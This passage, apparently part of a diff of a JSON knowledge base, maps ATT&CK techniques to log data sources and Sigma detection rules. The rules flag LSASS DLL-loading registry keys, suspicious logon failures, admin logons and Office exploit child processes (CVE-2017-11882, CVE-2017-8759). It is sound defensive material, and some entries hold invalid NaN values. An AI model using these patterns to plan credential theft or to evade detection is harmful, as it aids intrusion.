This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1177", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "experimental", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth", + "date": "2019/10/16", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": [ + 12, + 13 + ], + "TargetObject": [ + "*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt*", + "*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.t1177" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "Sysmon - ID 6", + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "Loaded 
DLLs" + ], + [ + "Sysmon - ID 6", + "Kernel drivers" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1078", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "description": "Detect remote login by Administrator user depending on internal pattern", + "references": [ + "https://car.mitre.org/wiki/CAR-2016-04-005" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078", + "car.2016-04-005" + ], + "status": "experimental", + "author": "juju4", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Identifiable administrators usernames (pattern or special unique character. ex: \"Admin-*\"), internal policy mandating use only as secondary account" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 10, + "AuthenticationPackageName": "Negotiate", + "AccountName": "Admin-*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + { + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "references": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" + ], + "author": "@neu5ron", + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit 
Authorization Policy Change" + }, + "detection": { + "selection": { + "EventID": 4704 + }, + "keywords": { + "Message": [ + "*SeEnableDelegationPrivilege*" + ] + }, + "condition": "all of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth", + "modified": "2019/03/01", + "references": [ + "https://twitter.com/SBousseaden/status/1101431884540710913" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4625, + 4776 + ], + "Status": [ + "0xC0000072", + "0xC000006F", + "0xC0000070", + "0xC0000413", + "0xC000018C", + "0xC000015B" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "User using a disabled account" + ], + "level": "high" + }, + { + "title": "Multiple Failed Logins with Different Accounts from Single Source System", + "id": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection1": { + "EventID": [ + 529, + 4625 + ], + "UserName": "*", + "WorkstationName": "*" + }, + "selection2": { + "EventID": 4776, + "UserName": "*", + "Workstation": "*" + }, + "timeframe": "24h", + "condition": [ + "selection1 | count(UserName) by WorkstationName > 3", + "selection2 | count(UserName) by Workstation > 3" + ] + }, + "falsepositives": [ + "Terminal 
servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "level": "medium" + }, + { + "title": "Interactive Logon to Server Systems", + "id": "3ff152b2-1388-4984-9cd9-a323323fdadf", + "description": "Detects interactive console logons to", + "author": "Florian Roth", + "tags": [ + "attack.lateral_movement", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 528, + 529, + 4624, + 4625 + ], + "LogonType": 2, + "ComputerName": [ + "%ServerSystems%", + "%DomainControllers%" + ] + }, + "filter": { + "LogonProcessName": "Advapi", + "ComputerName": "%Workstations%" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrative activity via KVM or ILO board" + ], + "level": "medium" + }, + { + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "status": "stable", + "author": "Florian Roth", + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4732 + }, + "selection_group1": { + "GroupName": "Administrators" + }, + "selection_group2": { + "GroupSid": "S-1-5-32-544" + }, + "filter": { + "SubjectUserName": "*$" + }, + "condition": "selection and (1 of selection_group*) and not filter" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "medium" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "user account", + "definition": "The representation of a 
user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information 
about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.rsaconference.com/writable/presentations/file_upload/hta-f02-detecting-and-responding-to-advanced-threats-within-exchange-environments.pdf", + "http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2", + "https://www.justice.gov/file/1080281/download", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + 
"https://www.brighttalk.com/webcast/10703/275683", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1211", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Droppers exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "experimental", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "references": [ + 
"https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw" + ], + "author": "Florian Roth", + "date": "2017/11/23", + "tags": [ + "attack.defense_evasion", + "attack.t1211" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\EQNEDT32.EXE" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Microsoft Malware Protection Engine Crash", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "tags": [ + "attack.defense_evasion", + "attack.t1089", + "attack.t1211" + ], + "status": "experimental", + "date": "2017/05/09", + "references": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "application" + }, + "detection": { + "selection1": { + "Source": "Application Error", + "EventID": 1000 + }, + "selection2": { + "Source": "Windows Error Reporting", + "EventID": 1001 + }, + "keywords": { + "Message": [ + "*MsMpEng.exe*", + "*mpengine.dll*" + ] + }, + "condition": "1 of selection* and all of keywords" + }, + "falsepositives": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + "1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + "1001", + "Windows Error 
Reporting" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", NaN + ] + }, + { + "technique_id": "T1203", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "references": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "author": "Florian Roth", + "date": "2017/09/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\WINWORD.EXE", + "Image": "*\\csc.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "System calls" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + 
"https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.riskiq.com/blog/labs/cobalt-strike/", + "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + 
